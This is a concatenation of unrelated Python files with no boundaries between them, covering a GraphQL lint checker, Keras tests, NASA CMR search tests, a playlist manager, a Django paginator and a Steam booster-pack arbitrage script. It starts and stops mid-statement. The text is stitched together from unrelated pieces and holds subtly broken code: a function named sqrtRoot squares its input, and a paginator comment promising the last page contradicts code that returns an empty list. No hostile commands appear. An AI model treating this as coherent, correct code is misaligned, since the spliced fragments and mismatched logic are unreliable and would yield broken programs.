TypeError(type(node)) return arg.s class ImportOrderChecker(object): visitor_class = ImportVisitor options = None def __init__(self, filename, tree): self.tree = tree self.filename = filename self.lines = None def load_file(self): if self.filename in ("stdin", "-", None): self.filename = "stdin" self.lines = pycodestyle.stdin_get_value().splitlines(True) else: self.lines = pycodestyle.readlines(self.filename) if not self.tree: self.tree = ast.parse("".join(self.lines)) def get_schema(self): gql_introspection_schema = self.options.get("gql_introspection_schema") if gql_introspection_schema: try: with open(gql_introspection_schema) as data_file: introspection_schema = json.load(data_file) return build_client_schema(introspection_schema) except IOError as e: raise Exception( "Cannot find the provided introspection schema. 
{}".format(str(e)) ) schema = self.options.get("schema") assert schema, "Need to provide schema" def validation_errors(self, ast): return validate(self.get_schema(), ast) def error(self, node, code, message): raise NotImplementedError() def check_gql(self): if not self.tree or not self.lines: self.load_file() visitor = self.visitor_class(self.filename, self.options) visitor.visit(self.tree) for node in visitor.calls: # Lines with the noqa flag are ignored entirely if pycodestyle.noqa(self.lines[node.lineno - 1]): continue query = visitor.node_query(node) if not query: continue try: source = Source(query, "gql query") ast = parse(source) except Exception as e: message = str(e) yield self.error(node, GQL_SYNTAX_ERROR, message) continue validation_errors = self.validation_errors(ast) if validation_errors: for error in validation_errors: message = str(error) yield self.error(node, GQL_VALIDATION_ERROR, message) import psycopg2 from sqlalchemy import create_engine # connection parameters hostname = '' username = '' password = '' database = '' dialect = '' #engine for alechemy engine = dialect + "://" + username + ":" + password +"@" + hostname + "/" + database #string for psycopg2 conn = psycopg2.connect( host=hostname, user=username, password=password, dbname=database ) # In python, you define a function like this # def funcname(parameter_list): # pass def sqrtRoot(param): return param * param # Calling the function print(sqrtRoot(2)) # You can also pass another function to a function as parameter def doSomething(funcX, paramX): return funcX(paramX) print(doSomething(sqrtRoot, 6)) # Lambda functions allows you to pass simple function inline without giving it a name print(doSomething(lambda x: x * x * x, 3)) from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import tensorflow as tf from keras import layers, keras_parameterized from keras.utils.generic_utils import custom_object_scope from tfmiss.keras.testing_utils import layer_multi_io_test class OneToManyLayer(layers.Dense): def call(self, inputs): result = super(OneToManyLayer, self).call(inputs) return result, result + result def compute_output_shape(self, input_shape): result = super(OneToManyLayer, self).compute_output_shape(input_shape) return result, result @keras_parameterized.run_all_keras_modes class LayerMultiIOTestTest(keras_parameterized.TestCase): def test_one_to_one(self): layer_multi_io_test( layers.Dense, kwargs={'units': 10}, input_shapes=[(2, 4)], expected_output_shapes=[(None, 10)] ) layer_multi_io_test( layers.Dense, kwargs={'units': 10}, input_shapes=[(2, 4)], input_dtypes=['float32'], expected_output_dtypes=['float32'] ) layer_multi_io_test( layers.Dense, kwargs={'units': 10}, input_shapes=[(2, 4)], input_datas=[np.random.random((2, 4)).astype(np.float32)], expected_output_dtypes=['float32'] ) layer_multi_io_test( layers.Dense, kwargs={'units': 10, 'dtype': 'float16'}, input_shapes=[(2, 4)], input_dtypes=['float16'], input_datas=[np.random.random((2, 4)).astype(np.float16)], expected_output_shapes=[(None, 10)], expected_output_dtypes=['float16'] ) layer_multi_io_test( layers.Dense, kwargs={'units': 10, 'dtype': 'float16'}, input_datas=[np.random.random((2, 4))], input_dtypes=['float16'], expected_output_dtypes=['float16'] ) layer_multi_io_test( layers.Dense, kwargs={'units': 10, 'dtype': 'float16'}, input_datas=[np.random.random((2, 10)).astype(np.float16)], expected_output_dtypes=['float16'] ) def test_many_to_one(self): layer_multi_io_test( 
layers.Add, input_shapes=[(2, 4), (2, 4)], expected_output_shapes=[(None, 4)] ) def test_one_to_many(self): with custom_object_scope( {'OneToManyLayer': OneToManyLayer}): layer_multi_io_test( OneToManyLayer, kwargs={'units': 10}, input_shapes=[(2, 4)], expected_output_dtypes=['float32', 'float32'], expected_output_shapes=[(None, 10), (None, 10)] ) if __name__ == "__main__": tf.test.main() notebook/utils/prep.py import json import os from utils.bpconfig import BPConfig from sagemaker.s3 import S3Downloader # the sample v1.0 flow included as an example for this blueprint FLOW_NAME = "uci-bank-marketing-dataset.flow" def copy_sample_flow_to_local(workspace, local_dir) : config = BPConfig.get_config(workspace, local_dir) fname = f"{local_dir}/{FLOW_NAME}" flow_uri = f"s3://{workspace}/{config.ws_prefix()}/meta/{FLOW_NAME}" S3Downloader.download(flow_uri, local_dir) # Change the flow definition so that it references the dataset copied over by the user def _update_sample_flow_def(fname, s3_uri) : with open(fname, 'r+') as f: flow_def = json.loads(f.read()) nodes = flow_def["nodes"] for n in nodes : if n["type"] == "SOURCE" : data_def = n["parameters"]["dataset_definition"] dstype = data_def["datasetSourceType"] if dstype == "S3" : data_def["s3ExecutionContext"]["s3Uri"] = s3_uri f.seek(0) f.write(json.dumps(flow_def)) f.truncate() _update_sample_flow_def(fname, config.sample_data_uri()) return fname1000+ # coding=utf8 import json import logging from settings import MEDIA_ROOT logger = logging.getLogger('listenone.' + __name__) class Playlist(object): def __init__(self): self.cover_img_url = '' self.title = '' self.play_count = 0 self.list_id = '' manager_instance = None class PlaylistManager(object): default_path = MEDIA_ROOT + '/user/' + 'playlist.json' @classmethod def shared_instance(cls): global manager_instance if manager_instance is None: manager_instance = PlaylistManager() return manager_instance def __init__(self, path=None): self.path = self.default_path if path is None else path try: self.load_from_disk() self.nextid = 1 for l in self.mylists: listid = int(l['id'].split('_')[1]) if listid >= self.nextid: self.nextid = listid + 1 except: self.mylists = [] self.nextid = 1 def save_to_disk(self): s = json.dumps(self.mylists) with open(self.path, 'w') as f: f.write(s) def load_from_disk(self): with open(self.path, 'r') as f: s = f.read() self.mylists = json.loads(s) def get_playlist(self, list_id): targetlist = None for playlist in self.mylists: if playlist['id'] == list_id: targetlist = playlist break return targetlist def create_playlist( self, title, cover_img_url='/static/images/mycover.jpg', tracks=None): newlist_id = 'my_' + str(self.nextid) if tracks is None: my_tracks = [] else: my_tracks = tracks newlist = dict( title=title, id=newlist_id, cover_img_url=cover_img_url, tracks=my_tracks) self.nextid += 1 self.mylists.append(newlist) self.save_to_disk() return newlist_id def list_playlist(self): resultlist = [] for l in self.mylists: r = dict( cover_img_url=l['cover_img_url'], title=l['title'], play_count=0, list_id=l['id'],) resultlist.append(r) return resultlist def remove_playlist(self, list_id): target_index = -1 for index, playlist in enumerate(self.mylists): if playlist['id'] == list_id: target_index = index break self.mylists = self.mylists[:target_index] + \ self.mylists[target_index + 1:] self.save_to_disk() def is_exist_in_playlist(self, track_id, list_id): playlist = self.get_playlist(list_id) for d in playlist['tracks']: if d['id'] == track_id: return True return False 
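# Illustrative usage sketch (comments only; not part of the original module). From the methods above,
# PlaylistManager persists self.mylists to MEDIA_ROOT + '/user/playlist.json' as a JSON list of dicts, e.g.
#   [{"title": "My list", "id": "my_1", "cover_img_url": "/static/images/mycover.jpg", "tracks": []}]
# and a typical call sequence would be:
#   manager = PlaylistManager.shared_instance()
#   list_id = manager.create_playlist("My list")          # returns e.g. "my_1" and saves the file
#   manager.add_track_in_playlist({"id": "t1"}, list_id)  # add_track_in_playlist is defined just below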
def add_track_in_playlist(self, track, list_id): track_id = track['id'] if self.is_exist_in_playlist(track_id, list_id): return playlist = self.get_playlist(list_id) playlist['tracks'].append(track) self.save_to_disk() def remove_track_in_playlist(self, track_id, list_id): playlist = self.get_playlist(list_id) target_index = -1 for index, d in enumerate(playlist['tracks']): if d['id'] == track_id: target_index = index break playlist['tracks'] = playlist['tracks'][:target_index] + \ playlist['tracks'][target_index + 1:] marcostx/deepBatLearning from pyAudioAnalysis import audioBasicIO,audioFeatureExtraction import operator import numpy as np import os import cv2 import warnings warnings.filterwarnings('ignore') baseDataset = "dataset/" positivePath = 'PositiveRandom/' allDataPath = 'allPositiveData/' indexClass=[0,1,2,3,4,5,13,14,16] classesNames={} classCounter=[] c_C=0 X={} def featureExtractor(fileName): [Fs, x] = audioBasicIO.readAudioFile(fileName) Features = audioFeatureExtraction.stFeatureExtraction(x, Fs,0.001 * Fs, 0.0009 * Fs) MFCCs = [] for index in range(len(Features)): MFCCs.append(float(np.max(Features[index]))) return MFCCs def img2array(image): vector = [] for line in image: for column in line: vector.append(float(column[0])/255) return np.array(vector) def parseData(isImage=True): count = 0 for idx, val in enumerate(os.listdir(baseDataset)): if not val in classesNames.keys(): classesNames[val] = count count += 1 for idx_, img_folder in enumerate(os.listdir(baseDataset + val)): if idx_ > 0 and os.path.isdir(baseDataset + val + '/' + img_folder): for marker, audio in enumerate(os.listdir(baseDataset + val + '/' + img_folder)): if os.stat(baseDataset + val + '/' + img_folder +'/'+ audio).st_size==0: continue if marker > 0 and audio.endswith('WAV') and isImage: if not classesNames[val] in X.keys(): X[classesNames[val]] = baseDataset + val + '/' + img_folder + '/Spec/Crop/c' + audio.replace('WAV','png') else: X[classesNames[val]] = X[classesNames[ val]] + ',' + baseDataset + val + '/' + img_folder + '/Spec/Crop/c' + audio.replace('WAV','png') elif marker > 0 and audio.endswith('WAV') and not isImage: if not classesNames[val] in X.keys(): X[classesNames[val]] = baseDataset + val + '/' + img_folder +'/'+ audio else: X[classesNames[val]] = X[classesNames[ val]] + ',' + baseDataset + val + '/' + img_folder +'/'+ audio X_ = [] y_ = [] sorted_classesNames= sorted(classesNames.items(), key=operator.itemgetter(0)) realClass = 0 for classVal in range(len(sorted_classesNames)): if classVal in X.keys(): arquivos = X[classVal].split(',') print("accepting : ", classVal) for val in arquivos: if (isImage): img_ = cv2.imread(val) #img_ = img2array(img_) #img_ = img_.astype('float32') X_.append(img_) y_.append(realClass) else: X_.append(featureExtractor(val)) y_.append(realClass) realClass += 1 X_ = np.array(X_) y_ = np.array(y_) return X_, y_ # NASA EO-Metadata-Tools Python interface for the Common Metadata Repository (CMR) # # https://cmr.earthdata.nasa.gov/search/site/docs/search/api.html # # Copyright (c) 2020 United States Government as represented by the Administrator # of the National Aeronautics and Space Administration. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software distributed # under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. """ Test cases for the cmr.auth package Author: - NASA Created: 2020-11-30 """ from unittest.mock import Mock from unittest.mock import patch import unittest import urllib.error as urlerr import test.cmr as tutil import cmr.util.common as common import cmr.search.common as scom # ****************************************************************************** def valid_cmr_response(file, status=200, headers=()): """return a valid login response""" json_response = common.read_file(file) return tutil.MockResponse(json_response, status=status, headers=headers) class TestSearch(unittest.TestCase): """Test suit for Search API""" # ********************************************************************** # Tests def test_meta_fields(self): """ Test that the meta fields are returned """ test = lambda exp, given, msg : self.assertEqual(exp, scom.meta_fields(given), msg) test({}, {}, "empty") test({'key':'value'}, {'key':'value'}, "unrelated") test('meta-value', {'meta':'meta-value'}, "found a meta") def test_umm_fields(self): """ Test that the UMM fields are returned """ test = lambda exp, given, msg : self.assertEqual(exp, scom.umm_fields(given), msg) test({}, {}, "empty") test({'key':'value'}, {'key':'value'}, "unrelated") test('umm-value', {'umm':'umm-value'}, "found a umm") def test_concept_id_fields(self): """ Test that the concept id fields are returned """ test = lambda exp, given, msg : self.assertEqual(exp, scom.concept_id_fields(given), msg) test({}, {}, "empty") test({'key':'value'}, {'key':'value'}, "unrelated") test({'concept-id':'C123'}, {'meta':{'concept-id':'C123'}}, "found a concept-id in meta") test({'concept-id':'C123'}, {'concept-id':'C123'}, "found a concept-id") # pylint: disable=W0212 def test_next_state(self): """Check that the sort by attribute is added correctly""" #setup orig_state = scom.create_page_state() # try once next_state = scom._next_page_state(orig_state, 10) self.assertEqual(10, next_state['took']) self.assertEqual(2, next_state['page_num']) # try again final_state = scom._next_page_state(next_state, 10) self.assertEqual(20, final_state['took']) self.assertEqual(3, final_state['page_num']) def test__error_object(self): """ Test that the Error Object is constructed correctly """ err = lambda code, msg : {'errors': [msg], 'code':code, 'reason':msg} # pylint: disable=C0301 # lambda lines can not be shorter test = lambda code, emsg, msg : self.assertEqual(err(code, emsg), scom._error_object(code, emsg), msg) test(None, None, "nones") test(200, "OK", "200 msg") test(500, "Server Error", "500 error") def test_create_state(self): """Test the function which generates a page state""" base_state = scom.create_page_state() self.assertEqual(10, base_state['page_size']) self.assertEqual(1, base_state['page_num']) self.assertEqual(0, base_state['took']) self.assertEqual(10, base_state['limit']) limit_state = scom.create_page_state(limit=None) self.assertEqual(10, limit_state['page_size']) self.assertEqual(10, limit_state['limit']) limit_state = scom.create_page_state(limit=1000) self.assertEqual(1000, limit_state['page_size']) self.assertEqual(1000, limit_state['limit']) 
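# Note on the behaviour pinned down by the assertions in this test (inferred from the asserts themselves,
# not from separate documentation): page_size is adjusted to match the requested limit when the limit fits
# in a single page, is capped at 2000 records per page for large limits (e.g. limit=4000), and for
# limit=2048 the page size drops to 683 so the download is split across several pages.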
limit_priority_state = scom.create_page_state(page_size=1500, limit=1200) self.assertEqual(1200, limit_priority_state['page_size']) self.assertEqual(1200, limit_priority_state['limit']) mixed_state = scom.create_page_state(page_size=1200, limit=1500) self.assertEqual(1500, mixed_state['page_size']) self.assertEqual(1500, mixed_state['limit']) high_state = scom.create_page_state(page_size=1000, limit=4000) self.assertEqual(2000, high_state['page_size']) self.assertEqual(4000, high_state['limit']) high_state = scom.create_page_state(limit=2048) self.assertEqual(683, high_state['page_size']) # pylint: disable=W0212 def test_continue_download(self): """Test the function that checks if enough records have been downloaded""" #limit to 10, 10 per page, first page page_state = scom.create_page_state() self.assertFalse(scom._continue_download(page_state)) #limit to 1000, 1000 per page, first page page_state = scom.create_page_state(limit=1000) self.assertFalse(scom._continue_download(page_state)) #limit to 4000, 2000 per page, first page page_state = scom.create_page_state(limit=4000) self.assertTrue(scom._continue_download(page_state)) #limit to 1000, 2000 per page, second page page_state = scom.create_page_state(page_num=2, limit=4000) self.assertFalse(scom._continue_download(page_state)) #limit to 1000, 683 per page, second page page_state = scom.create_page_state(page_num=1, limit=2048) self.assertTrue(scom._continue_download(page_state)) #limit to 2048, 683 per page, second page page_state = scom.create_page_state(page_num=2, limit=2048) self.assertTrue(scom._continue_download(page_state)) #limit to 2048, 683 per page, third page page_state = scom.create_page_state(page_num=3, limit=2048) self.assertFalse(scom._continue_download(page_state)) # pylint: disable=W0212 def test_standard_headers_from_config(self): """Test that standard headers can be setup""" basic_expected = {'Client-Id': 'python_cmr_lib', 'User-Agent': 'python_cmr_lib'} basic_result = scom._standard_headers_from_config({'a':1}) self.assertEqual(basic_expected, basic_result) config = {'cmr-token': 'a-cmr-token', 'X-Request-Id': '0123-45-6789', 'Client-Id': 'fancy-client', 'Not-A-Header': 'do not include me'} defined_expected = {'Echo-Token': 'a-cmr-token', 'X-Request-Id': '0123-45-6789', 'User-Agent': 'python_cmr_lib', 'Client-Id': 'fancy-client'} defined_result = scom._standard_headers_from_config(config) self.assertEqual(defined_expected, defined_result) config = {'cmr-token': '', 'Not-A-Header': 'do not include me'} token_expected = {'Echo-Token': '', 'User-Agent': 'python_cmr_lib', 'Client-Id': 'python_cmr_lib'} token_result = scom._standard_headers_from_config(config) self.assertEqual(token_expected, token_result) # pylint: disable=W0212 def test_cmr_query_url(self): """ Test that a CMR url can be built correctly""" page_state = scom.create_page_state() result = scom._cmr_query_url("search", {'provider':'p01'}, page_state, config={'env':'sit'}) expected = 'https://cmr.sit.earthdata.nasa.gov/search/search?' \ 'page_size=10&provider=p01' self.assertEqual(expected, result) #now test for scrolling page_state = scom.create_page_state(limit=2048) result = scom._cmr_query_url("search", {'provider':'p01'}, page_state, config={'env':'sit'}) expected = 'https://cmr.sit.earthdata.nasa.gov/search/search?' 
\ 'page_size=683&provider=p01&scroll=true' self.assertEqual(expected, result) #now test for scrolling result = scom._cmr_query_url("search", {'provider':'p01'}, page_state, config={'env':'sit'}) expected = 'https://cmr.sit.earthdata.nasa.gov/search/search?' \ 'page_size=683&provider=p01&scroll=true' self.assertEqual(expected, result) result = scom._cmr_query_url("search", {'provider':'p01'}, page_state, config={'env':'sit.'}) expected = 'https://cmr.sit.earthdata.nasa.gov/search/search?' \ 'page_size=683&provider=p01&scroll=true' self.assertEqual(expected, result) result = scom._cmr_query_url("search", {'provider':'p01'}, page_state, config={}) expected = 'https://cmr.earthdata.nasa.gov/search/search?' \ 'page_size=683&provider=p01&scroll=true' self.assertEqual(expected, result) result = scom._cmr_query_url("search", {}, page_state, config={}) expected = 'https://cmr.earthdata.nasa.gov/search/search?' \ 'page_size=683&scroll=true' self.assertEqual(expected, result) @patch('urllib.request.urlopen') def test_scroll(self, urlopen_mock): """ Test the scroll clear function to see if it returns an error or not""" recorded_file = tutil.resolve_full_path('../data/cmr/common/scroll_good.json') urlopen_mock.return_value = valid_cmr_response(recorded_file, 204) result = scom.clear_scroll('-1') self.assertFalse('errors' in result) recorded_file = tutil.resolve_full_path('../data/cmr/common/scroll_bad.json') urlopen_mock.return_value = valid_cmr_response(recorded_file, 404) result = scom.clear_scroll('0') self.assertTrue('errors' in result) @patch('urllib.request.urlopen') def test__make_search_request(self, urlopen_mock): """ Test the inner function which performs the first half of a search """ recorded_file = tutil.resolve_full_path('../data/cmr/common/scroll_good.json') urlopen_mock.return_value = valid_cmr_response(recorded_file, 204) page_state = scom.create_page_state() page_state['CMR-Scroll-Id'] = 'abcd' response = scom._make_search_request('search', {'keyword':'water'}, page_state, {'env':'sit'}) self.assertEqual({'http-headers': {}}, response, 'test that the scroll id code gets touched') @patch('urllib.request.urlopen') @patch('cmr.search.common.clear_scroll') def test_search_by_page(self, clr_scroll_mock, urlopen_mock): """ Test the inner function which performs the first half of a search """ recorded_file = tutil.resolve_full_path('../data/cmr/search/ten_results_from_ghrc.json') urlopen_mock.return_value = valid_cmr_response(recorded_file, 200) query = {'keyword':'water'} response = scom.search_by_page('collections', query) self.assertEqual(10, len(response), 'assumed page_state') # page state uses scroll page_state = scom.create_page_state(limit=4000) urlopen_mock.return_value = valid_cmr_response(recorded_file, 200, [('CMR-Scroll-Id','si-01')]) page_state['CMR-Scroll-Id'] = 'abcd' response = scom.search_by_page('collections', query, page_state=page_state) self.assertEqual(20, len(response), 'assumed page_state') # error processing 1 urlopen_mock.return_value = tutil.MockResponse("I'm a tea pot", 418) response = scom.search_by_page('collections', query, config={'debug':True}) expected = {'errors': ['unknown response: I\'m a tea pot'], 'code': 0, 'reason': 'unknown response: I\'m a tea pot'} self.assertEqual(expected, response, "exeption") # error processing 2 urlopen_mock.return_value = valid_cmr_response('{"errors":["Error"]}', 500) urlopen_mock.side_effect = urlerr.HTTPError(Mock(status=500), "500", "Server Error", None, None) response = scom.search_by_page('collections', query) expected 
= {'code': '500', 'reason': 'Server Error', 'errors': ['Server Error']} self.assertEqual(expected, response, "exeption") # bad clear response is logged recorded_file = tutil.resolve_full_path('../data/cmr/search/ten_results_from_ghrc.json') clr_scroll_mock.return_value = {'errors': ['bad scroll id']} urlopen_mock.return_value = valid_cmr_response(recorded_file, 200) urlopen_mock.side_effect = None response = scom.search_by_page('collections', query, page_state=page_state) self.assertEqual(10, len(response), "bad scroll id") # takes to long recorded_file = tutil.resolve_full_path('../data/cmr/search/ten_results_from_ghrc.json') page_state['took'] = 300001 page_state['page_size'] = 1 urlopen_mock.return_value = valid_cmr_response(recorded_file, 200) response = scom.search_by_page('collections', query, page_state=page_state) self.assertEqual(10, len(response), "bad scroll id") @patch('urllib.request.urlopen') def test_experimental_search(self, urlopen_mock): """ def search(query=None, filters=None, limit=None, options=None): """ # Setup recorded_file = tutil.resolve_full_path('../data/cmr/search/ten_results_from_ghrc.json') # Basic urlopen_mock.return_value = valid_cmr_response(recorded_file, 200) generator = scom.experimental_search_by_page_generator('collections', {'provider':'SEDAC'}) for item in generator: self.assertEqual("ORNL_DAAC", item['meta']['provider-id'], 'basic test') # page state uses scroll urlopen_mock.return_value = valid_cmr_response(recorded_file, 200, [('CMR-Scroll-Id','abcd')]) page_state = scom.create_page_state(limit=4000) page_state['CMR-Scroll-Id'] = 'abcd' generator = scom.experimental_search_by_page_generator('collections', {'provider':'SEDAC'}, page_state=page_state) for item in generator: self.assertEqual("ORNL_DAAC", item['meta']['provider-id'], 'trigger scrloll id check') # error processing writes to log urlopen_mock.side_effect = urlerr.HTTPError(Mock(status=500), "500", "Server Error", None, None) generator = None try: with self.assertLogs(scom.logger, level='ERROR') as test_log: try: end_point = 'collections' query = {'provider':'ORNL_DAAC'} generator = scom.experimental_search_by_page_generator(end_point, query) _ = next(generator) #consume generator to force action except StopIteration: pass #self.assertTrue(True, "generator should be empty") self.assertEqual(test_log.output, ["ERROR:cmr.search.common:Error in generator: Server Error."], "logs not matching") except AssertionError: self.fail('no log entry') @patch('webbrowser.open') def test_open_api(self, webopener): """ Test the function of the open_api without actually opening it """ webopener.return_value = "ok" self.assertEqual(None, scom.open_api('section')) # need to test search_by_page 10-100 from django.core.paginator import EmptyPage from django.core.paginator import Paginator from django.core.paginator import PageNotAnInteger def paginator(page, object_list, per_page=40): """ Provides pagination for a given list of objects. Call function for any page needing pagination. """ paginator = Paginator( object_list, per_page) # Show default 40 objects per page try: objects = paginator.page(page) except PageNotAnInteger: # If page is not an integer, deliver first page. objects = paginator.page(1) except EmptyPage: # If page is out of range (e.g. 9999), deliver last page of results. 
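# NOTE: despite the comment above, the branch below returns an empty list rather than the last page;
# the usual Django idiom for "deliver last page of results" would be
# objects = paginator.page(paginator.num_pages)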
objects = [] return objects from core.editor import Editor from core.tools.pencil import Pencil from random import random class Salt(Pencil): def __init__(self, button, board): super(Salt, self).__init__(button, board) def _need_change(self, value): if self._fill == value: return False else: return random() ** 0.5 < Editor()["random"] 10-100 # Objective: find market arbitrages, e.g. sell a pack for more (fee excluded) than the cost to craft it (fee included). from creation_time_utils import fill_in_badges_with_next_creation_times_loaded_from_disk from creation_time_utils import get_current_time, determine_whether_a_booster_pack_can_be_crafted from inventory_utils import create_then_sell_booster_packs_for_batch from market_listing import get_steam_market_listing_url, update_marketability_status from market_order import load_market_order_data from market_utils import load_aggregated_badge_data from sack_of_gems import print_gem_price_reminder from transaction_fee import compute_sell_price_without_fee from utils import convert_listing_hash_to_app_id from utils import get_bullet_point_for_display from utils import get_steam_store_url from utils import get_steamcardexchange_url def determine_whether_booster_pack_was_crafted_at_least_once(badge_data: dict) -> bool: next_creation_time = badge_data['next_creation_time'] booster_pack_has_been_crafted_at_least_once = bool(next_creation_time is not None) return booster_pack_has_been_crafted_at_least_once def filter_out_badges_never_crafted(aggregated_badge_data: dict[int, dict], verbose: bool = True) -> dict[int, dict]: # Filter out games for which a booster pack was never crafted (according to 'data/next_creation_times.json'), # thus focus on games which are tracked more closely, because they are likely to show a market arbitrage (again). filtered_badge_data = dict() for app_id in aggregated_badge_data.keys(): individual_badge_data = aggregated_badge_data[app_id] booster_pack_is_tracked = determine_whether_booster_pack_was_crafted_at_least_once(individual_badge_data) if booster_pack_is_tracked: filtered_badge_data[app_id] = individual_badge_data if verbose: print('There are {} booster packs which are tracked, as they were crafted at least once. ({} omitted)'.format( len(filtered_badge_data), len(aggregated_badge_data) - len(filtered_badge_data))) return filtered_badge_data def filter_out_badges_recently_crafted(aggregated_badge_data: dict[int, dict], verbose: bool = True) -> dict[int, dict]: # Filter out games for which a booster pack was crafted less than 24 hours ago, # and thus which cannot be immediately crafted. filtered_badge_data = dict() current_time = get_current_time() for app_id in aggregated_badge_data.keys(): individual_badge_data = aggregated_badge_data[app_id] booster_pack_can_be_crafted = determine_whether_a_booster_pack_can_be_crafted(individual_badge_data, current_time) if booster_pack_can_be_crafted: filtered_badge_data[app_id] = individual_badge_data if verbose: print('There are {} booster packs which can be immediately crafted. 
({} excluded because of cooldown)'.format( len(filtered_badge_data), len(aggregated_badge_data) - len(filtered_badge_data))) return filtered_badge_data def determine_whether_an_arbitrage_might_exist(badge_data: dict, user_chosen_price_threshold: float = None) -> bool: sell_price_including_fee = badge_data['sell_price'] sell_price_without_fee = compute_sell_price_without_fee(sell_price_including_fee) try: gem_price_with_fee = badge_data['gem_price'] except KeyError: # This should only happen if the badge data is dummy (for profile backgrounds and emoticons). Typically, the # user prefers to rely on a user-chosen price threshold, and did not take the time to fill-in a dummy value for # the 'gem_price' field in badge_data. gem_price_with_fee = None if user_chosen_price_threshold is None: # Variable price threshold, automatically computed for each game. # Always use this option if you work with BOOSTER PACKS, because the cost to craft a pack changes for each game! price_threshold = gem_price_with_fee else: # Constant price threshold, enforced by the user. # Caveat: this is only useful to prune out candidates for PROFILE BACKGROUNDS or EMOTICONS, because the cost to # craft a **badge** does not depend on the game, contrary to the cost to craft a **booster pack**. price_threshold = user_chosen_price_threshold if price_threshold is None: raise AssertionError() an_arbitrage_might_exist = bool(price_threshold < sell_price_without_fee) return an_arbitrage_might_exist def determine_whether_sell_price_is_unknown(badge_data: dict) -> bool: sell_price_including_fee = badge_data['sell_price'] sell_price_was_not_retrieved = bool(sell_price_including_fee < 0) there_is_no_sell_order = bool(sell_price_including_fee == 0) sell_price_is_unknown = sell_price_was_not_retrieved or there_is_no_sell_order return sell_price_is_unknown def filter_out_badges_with_low_sell_price(aggregated_badge_data: dict[int | str, dict], user_chosen_price_threshold: float = None, category_name: str = None, verbose: bool = True) -> dict[int | str, dict]: # Filter out games for which the sell price (ask) is lower than the gem price, # because the bid is necessarily lower than the ask, so it will not be worth downloading bid data for these games. 
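# Illustrative example (made-up numbers) of the pruning rule implemented by
# determine_whether_an_arbitrage_might_exist() above: with no user-chosen threshold, the threshold is the
# gem cost of crafting the pack (fee included), so a pack whose gems cost 0.40 only stays a candidate if
# its sell price, once the seller fee is removed, is strictly above 0.40 -- e.g. 0.47 qualifies, 0.35 does not.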
if category_name is None: category_name = 'booster packs' if user_chosen_price_threshold is None: threshold_name = 'gem price' else: threshold_name = 'user-chosen price threshold {:.2f} €'.format( user_chosen_price_threshold / 100 ) filtered_badge_data = dict() unknown_price_counter = 0 for app_id in aggregated_badge_data.keys(): individual_badge_data = aggregated_badge_data[app_id] sell_price_is_unknown = determine_whether_sell_price_is_unknown(individual_badge_data) an_arbitrage_might_exist = determine_whether_an_arbitrage_might_exist(individual_badge_data, user_chosen_price_threshold=user_chosen_price_threshold) if sell_price_is_unknown or an_arbitrage_might_exist: filtered_badge_data[app_id] = individual_badge_data if sell_price_is_unknown: unknown_price_counter += 1 if verbose: print('There are {} {} with sell price unknown ({}) or strictly higher than {} ({}).'.format( len(filtered_badge_data), category_name, unknown_price_counter, threshold_name, len(filtered_badge_data) - unknown_price_counter)) return filtered_badge_data def find_badge_arbitrages(badge_data: dict, market_order_dict: dict[str, dict] = None, verbose: bool = False) -> dict[str, dict]: if market_order_dict is None: market_order_dict = load_market_order_data(badge_data, retrieve_market_orders_online=True) badge_arbitrages = dict() for app_id in badge_data.keys(): individual_badge_data = badge_data[app_id] gem_price_including_fee = individual_badge_data['gem_price'] listing_hash = individual_badge_data['listing_hash'] try: bid_including_fee = market_order_dict[listing_hash]['bid'] except KeyError: bid_including_fee = -1 if verbose: print('Bid not found for {}. Reason is likely that you asked not to retrieve market orders.'.format( listing_hash )) bid_without_fee = compute_sell_price_without_fee(bid_including_fee) if bid_including_fee < 0: continue delta = bid_without_fee - gem_price_including_fee # Check whether there is a profit to be made is_an_arbitrage = bool(delta > 0) if is_an_arbitrage: badge_arbitrages[listing_hash] = dict() # Warning: for profile backgrounds and emoticons, you cannot trust the value of app_id stored here, # because app_id is a dummy variable, which is simply a copy of listing_hash. # # However, for booster packs, app_id is correct, because there is a one-to-one mapping between # appIDs and listing hashes of booster packs. 
badge_arbitrages[listing_hash]['app_id'] = app_id try: badge_arbitrages[listing_hash]['name'] = individual_badge_data['name'] except KeyError: badge_arbitrages[listing_hash]['name'] = None try: badge_arbitrages[listing_hash]['gem_amount'] = individual_badge_data['gem_amount'] except KeyError: badge_arbitrages[listing_hash]['gem_amount'] = None badge_arbitrages[listing_hash]['gem_price_including_fee'] = individual_badge_data['gem_price'] badge_arbitrages[listing_hash]['sell_price'] = individual_badge_data['sell_price'] badge_arbitrages[listing_hash]['ask_including_fee'] = market_order_dict[listing_hash]['ask'] badge_arbitrages[listing_hash]['bid_including_fee'] = market_order_dict[listing_hash]['bid'] badge_arbitrages[listing_hash]['ask_volume'] = market_order_dict[listing_hash]['ask_volume'] badge_arbitrages[listing_hash]['bid_volume'] = market_order_dict[listing_hash]['bid_volume'] badge_arbitrages[listing_hash]['is_marketable'] = market_order_dict[listing_hash]['is_marketable'] badge_arbitrages[listing_hash]['bid_without_fee'] = bid_without_fee badge_arbitrages[listing_hash]['profit'] = delta if verbose: print('{:.2f}€\t{}'.format(delta, listing_hash)) return badge_arbitrages def print_arbitrages(badge_arbitrages: dict[str, dict], use_numbered_bullet_points: bool = False, use_hyperlink: bool = False) -> None: bullet_point = get_bullet_point_for_display(use_numbered_bullet_points=use_numbered_bullet_points) for listing_hash in sorted(badge_arbitrages.keys(), key=lambda x: badge_arbitrages[x]['profit'], reverse=True): arbitrage = badge_arbitrages[listing_hash] # Skip unmarketable booster packs if not arbitrage['is_marketable']: continue if use_hyperlink: app_id = convert_listing_hash_to_app_id(listing_hash) markdown_compatible_steam_market_url = get_steam_market_listing_url(listing_hash=listing_hash, render_as_json=False, replace_spaces=True) listing_hash_formatted_for_markdown = '[[store]({})][[market]({})] [{}]({})'.format( get_steam_store_url(app_id), markdown_compatible_steam_market_url, listing_hash, get_steamcardexchange_url(app_id), ) else: listing_hash_formatted_for_markdown = listing_hash gem_amount = arbitrage['gem_amount'] if gem_amount is None: gem_amount_as_str = gem_amount else: gem_amount_as_str = '{:.0f}'.format(gem_amount) print( '{}Profit: {:.2f}€\t{}\t| craft pack: {} gems ({:.2f}€) | sell for 